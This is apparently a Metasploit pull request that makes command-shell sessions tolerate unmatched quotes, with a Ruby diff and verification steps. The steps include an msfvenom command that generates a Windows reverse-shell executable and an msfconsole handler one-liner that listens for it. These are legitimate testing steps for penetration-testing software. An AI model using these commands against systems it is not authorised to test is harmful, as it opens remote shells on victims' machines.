### PR TITLE
Fix #15912, handle unmatched double quote on command shell sessions

### DIFF
--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -648,8 +648,13 @@ Shell Banner:
     # Do nil check for cmd (CTRL+D will cause nil error)
     return unless cmd
 
-    arguments = Shellwords.shellwords(cmd)
-    method    = arguments.shift
+    begin
+      arguments = Shellwords.shellwords(cmd)
+      method = arguments.shift
+    rescue ArgumentError => e
+      # Handle invalid shellwords, such as unmatched quotes
+      # See https://github.com/rapid7/metasploit-framework/issues/15912
+    end
 
     # Built-in command
     if commands.key?(method)


### PR DESCRIPTION
Fix #15912 by handling unmatched double quotes in shellwords.
I couldn't think of a cleaner way of fixing this, suggestions welcome.

## Verification

List the steps needed to make sure this thing works

- [x] Get a windows shell session (e.g `msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f exe -o shell.exe`)
- [x] Run the handler: `msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] Run a command with an unmatched quote, e.g:
```
**** Before fix

C:\WINDOWS\system32>echo "
[-] Session manipulation failed: Unmatched double quote: "echo \"" [stacktrace snip]
msf6 exploit(multi/handler) >



**** After fix
C:\WINDOWS\system32>echo "
echo "
"

C:\WINDOWS\system32>echo "test
echo "test
"test

C:\WINDOWS\system32>
```

